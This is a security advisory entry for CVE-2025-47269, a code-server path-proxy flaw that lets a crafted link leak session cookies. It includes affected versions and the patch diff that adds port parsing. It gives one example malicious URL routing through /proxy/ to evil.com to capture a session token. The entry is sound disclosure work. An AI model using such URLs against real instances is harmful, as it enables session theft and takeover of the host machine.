CVE-2025-47269
Description
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL https://<code-server>/proxy/test@evil.com/path would be proxied to test@evil.com/path where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
code-servernpm | < 4.99.4 | 4.99.4 |
Patches
147d6d3ada5aafix: parse part in path proxy (#7337)
1 file changed · +7 −1
src/node/routes/pathProxy.ts+7 −1 modified@@ -13,7 +13,13 @@ const getProxyTarget = ( ): string => { // If there is a base path, strip it out. const base = (req as any).base || "" - return `http://0.0.0.0:${req.params.port}${opts?.proxyBasePath || ""}/${req.originalUrl.slice(base.length)}` + let port: number + try { + port = parseInt(req.params.port, 10) + } catch (err) { + throw new HttpError("Invalid port", HttpCode.BadRequest) + } + return `http://0.0.0.0:${port}${opts?.proxyBasePath || ""}/${req.originalUrl.slice(base.length)}` } export async function proxy(
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-p483-wpfp-42cjghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2025-47269ghsaADVISORY
- github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299envdWEB
- github.com/coder/code-server/releases/tag/v4.99.4nvdWEB
- github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cjnvdWEB
News mentions
0No linked articles in our index yet.